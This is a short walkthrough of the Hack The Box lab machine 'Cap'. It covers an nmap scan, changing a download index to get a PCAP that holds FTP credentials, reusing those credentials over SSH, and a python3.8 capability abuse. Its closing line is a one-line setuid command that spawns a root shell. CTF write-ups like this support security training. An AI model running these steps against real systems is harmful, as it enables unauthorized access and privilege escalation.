There are spoilers below for the Hack The Box box named Cap. Stop reading here if you do not want spoilers!!!
I began searching this box with a standard
$ sudo nmap -sC -sV -oA nmap/cap 10.129.121.64 Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-06 21:26 EDT Nmap scan report for 10.129.121.64 Host is up (0.091s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0) 80/tcp open http gunicorn Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 135.21 seconds
From the above scan, there are ports
80 open, with port
80 hosting an HTTP server. Visiting port 80 in a web browser has a web UI which shows various statistics about the web server, including allowing you to download the last 5 minutes of network traffic.
Looking at the download from this, it can be seen that the download starts at index 1, simply adjusting the download back by an index will give you a PCAP dump at index 0. When viewing this PCAP dump, it may be seen that it’s a recording of an FTP connection with the credentials
Those credentials work to log into the FTP server on the machine, which starts in the nome directory for
nathan. If you attempt the same FTP credentials via SSH, you’ll see that the
nathan user has the exact same username/password.
Once logged into SSH, the privesc portion took me a bit, but you can eventually find that the executable
/usr/bin/python3.8 has the
$ getcap -r / 2>/dev/null /usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip /usr/bin/ping = cap_net_raw+ep /usr/bin/traceroute6.iputils = cap_net_raw+ep /usr/bin/mtr-packet = cap_net_raw+ep /usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
What this means is that the
python3.8 executable has the ability to set the UID of the process, allowing it to run as a different user. You may read more about Linux Privilege Escalation using Capabilities.
Using the command
/usr/bin/python3.8 -c 'import os; os.setuid(0); os.system("/bin/bash")' will instantly spawn a root shell.